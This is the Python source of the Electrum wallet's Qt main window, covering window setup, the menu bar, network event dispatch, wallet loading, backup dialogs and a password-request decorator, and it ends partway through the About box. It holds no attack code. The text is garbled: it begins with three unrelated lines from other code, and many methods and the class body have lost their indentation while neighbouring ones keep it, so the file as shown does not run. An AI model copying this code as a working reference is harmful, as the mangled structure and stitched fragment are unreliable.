cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
    # note: this class has a custom stylesheet applied in stylesheet_patcher.py
    """Small icon button for the status bar that invokes a callback on click
    or on Return/Enter."""

    def __init__(self, icon, tooltip, func):
        QToolButton.__init__(self)
        self.func = func
        self.setText('')
        self.setIcon(icon)
        self.setIconSize(QSize(25, 25))
        self.setMaximumWidth(25)
        self.setToolTip(tooltip)
        self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
        self.setAutoRaise(True)
        self.setCursor(QCursor(Qt.PointingHandCursor))
        self.clicked.connect(self.onPress)

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt5 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        # Treat Return/Enter like a click.
        if e.key() in (Qt.Key_Return, Qt.Key_Enter):
            self.func()
def protected(func):
    '''Password request wrapper. The password is passed to the function
    as the 'password' named argument. "None" indicates either an
    unencrypted wallet, or the user cancelled the password request.
    An empty input is passed as the empty string.'''
    def request_password(self, *args, **kwargs):
        window = self.top_level_window()
        pw = None
        # Keep prompting until the password verifies, or the user cancels.
        while self.wallet.has_keystore_encryption():
            pw = self.password_dialog(parent=window)
            if pw is None:
                # User cancelled password input
                return
            try:
                self.wallet.check_password(pw)
            except Exception as exc:
                self.show_error(str(exc), parent=window)
            else:
                break
        kwargs['password'] = pw
        return func(self, *args, **kwargs)
    return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
    def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
        """Build the main window for *wallet*: state, tabs, menu bar,
        keyboard shortcuts, network callbacks and the optional update check."""
        QMainWindow.__init__(self)
        self.gui_object = gui_object
        self.config = config = gui_object.config  # type: SimpleConfig
        self.gui_thread = gui_object.gui_thread
        assert wallet, "no wallet"
        self.wallet = wallet
        if wallet.has_lightning():
            self.wallet.config.set_key('show_channels_tab', True)
        self.setup_exception_hook()
        self.network = gui_object.daemon.network  # type: Network
        self.fx = gui_object.daemon.fx  # type: FxThread
        self.contacts = wallet.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        self.cleaned_up = False
        self.payment_request = None  # type: Optional[paymentrequest.PaymentRequest]
        self.payto_URI = None
        self.checking_accounts = False
        self.qr_window = None
        self.pluginsdialog = None
        self.showing_cert_mismatch_error = False
        self.tl_windows = []
        self.pending_invoice = None
        Logger.__init__(self)
        # Incoming txs are queued here and drained (rate-limited) by
        # notify_transactions() from the GUI timer.
        self.tx_notification_queue = queue.Queue()
        self.tx_notification_last_time = 0
        self.create_status_bar()
        self.need_update = threading.Event()
        self.completions = QStringListModel()
        coincontrol_sb = self.create_coincontrol_statusbar()
        # --- tabs ---
        self.tabs = tabs = QTabWidget(self)
        self.send_tab = self.create_send_tab()
        self.receive_tab = self.create_receive_tab()
        self.addresses_tab = self.create_addresses_tab()
        self.utxo_tab = self.create_utxo_tab()
        self.console_tab = self.create_console_tab()
        self.contacts_tab = self.create_contacts_tab()
        self.channels_tab = self.create_channels_tab()
        tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
        tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
        tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
        def add_optional_tab(tabs, tab, icon, description, name):
            # Stash metadata on the widget so toggle_tab() can re-insert the
            # tab at its canonical position; only add it if enabled in config.
            tab.tab_icon = icon
            tab.tab_description = description
            tab.tab_pos = len(tabs)
            tab.tab_name = name
            if self.config.get('show_{}_tab'.format(name), False):
                tabs.addTab(tab, icon, description.replace("&", ""))
        add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
        add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
        add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
        add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
        add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
        tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        central_widget = QWidget()
        vbox = QVBoxLayout(central_widget)
        vbox.setContentsMargins(0, 0, 0, 0)
        vbox.addWidget(tabs)
        vbox.addWidget(coincontrol_sb)
        self.setCentralWidget(central_widget)
        if self.config.get("is_maximized"):
            self.showMaximized()
        self.setWindowIcon(read_QIcon("electrum.png"))
        self.init_menubar()
        # --- keyboard shortcuts ---
        # weakref.proxy so the shortcut lambdas below don't keep the tab
        # widget (and hence the window) alive after close.
        wrtabs = weakref.proxy(tabs)
        QShortcut(QKeySequence("Ctrl+W"), self, self.close)
        QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
        QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
        QShortcut(QKeySequence("F5"), self, self.update_wallet)
        QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
        for i in range(wrtabs.count()):
            # i=i binds the loop variable now (avoids late-binding closures)
            QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
        self.payment_request_ok_signal.connect(self.payment_request_ok)
        self.payment_request_error_signal.connect(self.payment_request_error)
        self.show_error_signal.connect(self.show_error)
        self.history_list.setFocus(True)
        # network callbacks
        if self.network:
            self.network_signal.connect(self.on_network_qt)
            interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
                         'new_transaction', 'status',
                         'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
                         'on_history', 'channel', 'channels_updated',
                         'payment_failed', 'payment_succeeded',
                         'invoice_status', 'request_status', 'ln_gossip_sync_progress',
                         'cert_mismatch', 'gossip_db_loaded']
            # To avoid leaking references to "self" that prevent the
            # window from being GC-ed when closed, callbacks should be
            # methods of this class only, and specifically not be
            # partials, lambdas or methods of subobjects. Hence...
            util.register_callback(self.on_network, interests)
            # set initial message
            self.console.showMessage(self.network.banner)
            # update fee slider in case we missed the callback
            #self.fee_slider.update()
        self.load_wallet(wallet)
        gui_object.timer.timeout.connect(self.timer_actions)
        self.fetch_alias()
        # If the option hasn't been set yet
        if config.get('check_updates') is None:
            choice = self.question(title="Electrum - " + _("Enable update check"),
                                   msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
                                       _("Would you like to be notified when there is a newer version of Electrum available?"))
            config.set_key('check_updates', bool(choice), save=True)
        if config.get('check_updates', False):
            # The references to both the thread and the window need to be stored somewhere
            # to prevent GC from getting in our way.
            def on_version_received(v):
                if UpdateCheck.is_newer(v):
                    self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
                    self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
                    self.update_check_button.show()
            self._update_check_thread = UpdateCheckThread()
            self._update_check_thread.checked.connect(on_version_received)
            self._update_check_thread.start()
    def setup_exception_hook(self):
        # Install the crash-reporter exception hook; maybe_setup presumably
        # no-ops if one is already installed or reporting is disabled.
        Exception_Hook.maybe_setup(config=self.config,
                                   wallet=self.wallet)
    def run_coroutine_from_thread(self, coro, on_result=None):
        """Run *coro* on the network's asyncio loop, from the wallet's task thread.

        If *on_result* is given it is called (still on the wallet thread) with
        the coroutine's result. Exceptions are logged and shown to the user
        via show_error_signal.
        """
        def task():
            try:
                f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
                r = f.result()  # blocks the wallet thread until the coro finishes
                if on_result:
                    on_result(r)
            except Exception as e:
                self.logger.exception("exception in coro scheduled via window.wallet")
                self.show_error_signal.emit(str(e))
        self.wallet.thread.add(task)
    def on_fx_history(self):
        """Exchange-rate history changed: refresh fiat-dependent views."""
        self.history_model.refresh('fx_history')
        self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
    def push_top_level_window(self, window):
        '''Used for e.g. tx dialog box to ensure new dialogs are appropriately
        parented. This used to be done by explicitly providing the parent
        window, but that isn't something hardware wallet prompts know.'''
        self.tl_windows.append(window)

    def pop_top_level_window(self, window):
        # Counterpart of push_top_level_window().
        self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
    def diagnostic_name(self):
        # Overrides Logger.diagnostic_name (used to label this window's log output).
        #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
        return self.wallet.diagnostic_name()

    def is_hidden(self):
        """True if the window is minimized or hidden (e.g. minimized to tray)."""
        return self.isMinimized() or self.isHidden()

    def show_or_hide(self):
        """Toggle window visibility."""
        if self.is_hidden():
            self.bring_to_top()
        else:
            self.hide()

    def bring_to_top(self):
        """Unhide the window and raise it above other windows."""
        self.show()
        self.raise_()
    def on_error(self, exc_info):
        """Generic error handler for background tasks (sys.exc_info() tuple)."""
        e = exc_info[1]
        if isinstance(e, UserCancelled):
            # deliberate cancellation: stay silent
            pass
        elif isinstance(e, UserFacingException):
            self.show_error(str(e))
        else:
            # TODO would be nice if we just sent these to the crash reporter...
            # anything we don't want to send there, we should explicitly catch
            # send_exception_to_crash_reporter(e)
            try:
                self.logger.error("on_error", exc_info=exc_info)
            except OSError:
                pass  # see #4418
            self.show_error(repr(e))
    def on_network(self, event, *args):
        # Runs on the network thread: forward to the GUI thread via a signal.
        self.network_signal.emit(event, args)
    def on_network_qt(self, event, args=None):
        """Handle a network message in the GUI thread.

        note: all windows get events from all wallets! Events that carry a
        wallet in args[0] are filtered against self.wallet below.
        """
        if event == 'wallet_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.need_update.set()
        elif event == 'network_updated':
            self.gui_object.network_updated_signal_obj.network_updated_signal \
                .emit(event, args)
            self.network_signal.emit('status', None)
        elif event == 'blockchain_updated':
            # to update number of confirmations in history
            self.need_update.set()
        elif event == 'new_transaction':
            wallet, tx = args
            if wallet == self.wallet:
                # queued for notify_transactions() (rate-limited)
                self.tx_notification_queue.put(tx)
        elif event == 'on_quotes':
            self.on_fx_quotes()
        elif event == 'on_history':
            self.on_fx_history()
        elif event == 'gossip_db_loaded':
            self.channels_list.gossip_db_loaded.emit(*args)
        elif event == 'channels_updated':
            wallet = args[0]
            if wallet == self.wallet:
                self.channels_list.update_rows.emit(*args)
        elif event == 'channel':
            wallet = args[0]
            if wallet == self.wallet:
                self.channels_list.update_single_row.emit(*args)
                self.update_status()
        elif event == 'request_status':
            self.on_request_status(*args)
        elif event == 'invoice_status':
            self.on_invoice_status(*args)
        elif event == 'payment_succeeded':
            wallet = args[0]
            if wallet == self.wallet:
                self.on_payment_succeeded(*args)
        elif event == 'payment_failed':
            wallet = args[0]
            if wallet == self.wallet:
                self.on_payment_failed(*args)
        elif event == 'status':
            self.update_status()
        elif event == 'banner':
            self.console.showMessage(args[0])
        elif event == 'verified':
            wallet, tx_hash, tx_mined_status = args
            if wallet == self.wallet:
                self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
        elif event == 'fee':
            pass
        elif event == 'fee_histogram':
            self.history_model.on_fee_histogram()
        elif event == 'ln_gossip_sync_progress':
            self.update_lightning_icon()
        elif event == 'cert_mismatch':
            self.show_cert_mismatch_error()
        else:
            self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
    def close_wallet(self):
        """Detach the wallet from this window and run plugin close hooks."""
        if self.wallet:
            self.logger.info(f'close_wallet {self.wallet.storage.path}')
            # stop handing tasks to the (now stale) wallet task thread
            self.wallet.thread = None
            run_hook('close_wallet', self.wallet)
    @profiler
    def load_wallet(self, wallet: Abstract_Wallet):
        """Finish window setup once *wallet* is attached: start its task
        thread, refresh menus/tabs/views, and show the window."""
        wallet.thread = TaskThread(self, self.on_error)
        self.update_recently_visited(wallet.storage.path)
        if wallet.has_lightning():
            util.trigger_callback('channels_updated', wallet)
        self.need_update.set()
        # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
        # update menus
        self.seed_menu.setEnabled(self.wallet.has_seed())
        self.update_lock_icon()
        self.update_buttons_on_seed()
        self.update_console()
        self.clear_receive_tab()
        self.request_list.update()
        self.channels_list.update()
        self.tabs.show()
        self.init_geometry()
        if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
            # user opted to start hidden in the tray
            self.hide()
        else:
            self.show()
        self.watching_only_changed()
        run_hook('load_wallet', wallet, self)
        try:
            wallet.try_detecting_internal_addresses_corruption()
        except InternalAddressCorruption as e:
            self.show_error(str(e))
            send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
    def backup_wallet(self):
        """Modal dialog to copy the wallet file into the configured backup
        directory; per the dialog text, lightning channels are converted to
        channel backups in the copy."""
        d = WindowModalDialog(self, _("File Backup"))
        vbox = QVBoxLayout(d)
        grid = QGridLayout()
        backup_help = ""
        backup_dir = self.config.get('backup_dir')
        backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
        msg = _('Please select a backup directory')
        if self.wallet.has_lightning() and self.wallet.lnworker.channels:
            msg += '\n\n' + ' '.join([
                _("Note that lightning channels will be converted to channel backups."),
                _("You cannot use channel backups to perform lightning payments."),
                _("Channel backups can only be used to request your channels to be closed.")
            ])
        self.backup_dir_e = QPushButton(backup_dir)
        self.backup_dir_e.clicked.connect(self.select_backup_dir)
        grid.addWidget(backup_dir_label, 1, 0)
        grid.addWidget(self.backup_dir_e, 1, 1)
        vbox.addLayout(grid)
        vbox.addWidget(WWLabel(msg))
        vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
        if not d.exec_():
            # user cancelled
            return
        try:
            new_path = self.wallet.save_backup()
        except BaseException as reason:
            self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
            return
        if new_path:
            msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
            self.show_message(msg, title=_("Wallet backup created"))
        else:
            # save_backup() returned falsy: no backup dir configured
            self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
    def init_menubar(self):
        """Build the application menu bar (File / Wallet / View / Tools / Help)
        and keep references to the menu actions whose enabled/visible state is
        toggled elsewhere (e.g. in watching_only_changed)."""
        menubar = QMenuBar()
        # --- File ---
        file_menu = menubar.addMenu(_("&File"))
        self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
        file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
        file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
        file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
        file_menu.addAction(_("Delete"), self.remove_wallet)
        file_menu.addSeparator()
        file_menu.addAction(_("&Quit"), self.close)
        # --- Wallet ---
        wallet_menu = menubar.addMenu(_("&Wallet"))
        wallet_menu.addAction(_("&Information"), self.show_wallet_info)
        wallet_menu.addSeparator()
        self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
        self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
        self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
        self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
        self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
        self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
        self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
        wallet_menu.addSeparator()
        addresses_menu = wallet_menu.addMenu(_("&Addresses"))
        addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
        labels_menu = wallet_menu.addMenu(_("&Labels"))
        labels_menu.addAction(_("&Import"), self.do_import_labels)
        labels_menu.addAction(_("&Export"), self.do_export_labels)
        history_menu = wallet_menu.addMenu(_("&History"))
        history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
        history_menu.addAction(_("&Summary"), self.history_list.show_summary)
        history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
        history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
        contacts_menu = wallet_menu.addMenu(_("Contacts"))
        contacts_menu.addAction(_("&New"), self.new_contact_dialog)
        contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
        contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
        invoices_menu = wallet_menu.addMenu(_("Invoices"))
        invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
        invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
        requests_menu = wallet_menu.addMenu(_("Requests"))
        requests_menu.addAction(_("Import"), lambda: self.import_requests())
        requests_menu.addAction(_("Export"), lambda: self.export_requests())
        wallet_menu.addSeparator()
        wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
        # --- View (optional tabs) ---
        def add_toggle_action(view_menu, tab):
            # menu_action is stored on the tab so toggle_tab() can relabel it
            is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
            item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
            tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
        view_menu = menubar.addMenu(_("&View"))
        add_toggle_action(view_menu, self.addresses_tab)
        add_toggle_action(view_menu, self.utxo_tab)
        add_toggle_action(view_menu, self.channels_tab)
        add_toggle_action(view_menu, self.contacts_tab)
        add_toggle_action(view_menu, self.console_tab)
        # --- Tools ---
        tools_menu = menubar.addMenu(_("&Tools"))  # type: QMenu
        preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog)  # type: QAction
        if sys.platform == 'darwin':
            # "Settings"/"Preferences" are all reserved keywords in macOS.
            # preferences_action will get picked up based on name (and put into a standardized location,
            # and given a standard reserved hotkey)
            # Hence, this menu item will be at a "uniform location re macOS processes"
            preferences_action.setMenuRole(QAction.PreferencesRole)  # make sure OS recognizes it as preferences
            # Add another preferences item, to also have a "uniform location for Electrum between different OSes"
            tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
        tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
        tools_menu.addAction(_("&Lightning Network"), self.gui_object.show_lightning_dialog).setEnabled(bool(self.wallet.has_lightning() and self.network))
        tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog).setEnabled(bool(self.network and self.network.local_watchtower))
        tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
        tools_menu.addSeparator()
        tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
        tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
        tools_menu.addSeparator()
        paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
        raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
        raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
        raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
        raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
        raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
        self.raw_transaction_menu = raw_transaction_menu
        run_hook('init_menubar_tools', self, tools_menu)
        # --- Help ---
        help_menu = menubar.addMenu(_("&Help"))
        help_menu.addAction(_("&About"), self.show_about)
        help_menu.addAction(_("&Check for updates"), self.show_update_check)
        help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
        help_menu.addSeparator()
        help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
        help_menu.addAction(_("&Report Bug"), self.show_report_bug)
        help_menu.addSeparator()
        help_menu.addAction(_("&Donate to server"), self.donate_to_server)
        self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
    def show_about(self):
        """Show the About-Electrum message box."""
        QMessageBox.about(self, "Electrum",
                          (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
                           _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
                           _("You do not need to perform regular backups, because your wallet can be "
                             "recovered from a secret phrase that you can memorize or write on paper.") + " " +
                           _("Startup times are instant because it operates in conjunction with high-performance "
                             "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
